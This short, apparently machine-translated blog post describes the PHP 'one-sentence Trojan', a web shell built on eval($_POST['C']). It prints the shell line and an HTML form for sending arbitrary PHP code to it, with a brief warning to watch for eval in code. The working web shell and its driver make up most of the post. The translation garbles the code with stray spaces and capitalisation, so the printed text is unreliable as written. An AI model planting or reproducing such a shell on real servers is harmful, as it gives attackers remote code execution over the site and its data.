Php eval function one-sentence Trojan code
This is the source code of a common php Trojan. The post Trojan program is used to implant the trojan. The eval () function calculates the string according to the PHP code. The string must be a valid PHP code and must end with a semicolon. If the return statement is not called in the code string, NULL is returned. If a parsing error exists in the Code, the eval () function returns false.
Eval can be used to execute any other php code. Therefore, be careful when you find the eval function in the code. It may be a Trojan.
In this way, anyone can post any file, so do a good job of prevention.
?
1 |
<? Php @ eval ($ _ POST ['C']);?> |
The usage method is also very simple. When a local file is submitted pointing to the submitted file, the php code in the file will be executed.
?
1 2 3 4 5 6 7 8 |
<Html> <Body> <Form action = "a. php" method = "post"> <Input type = "text" name = "c" value = "phpinfo ();"> <Input type = "submit" value = "submit"> </Form> </Body> </Html> |
The above is all the content of this article. I hope you will like it.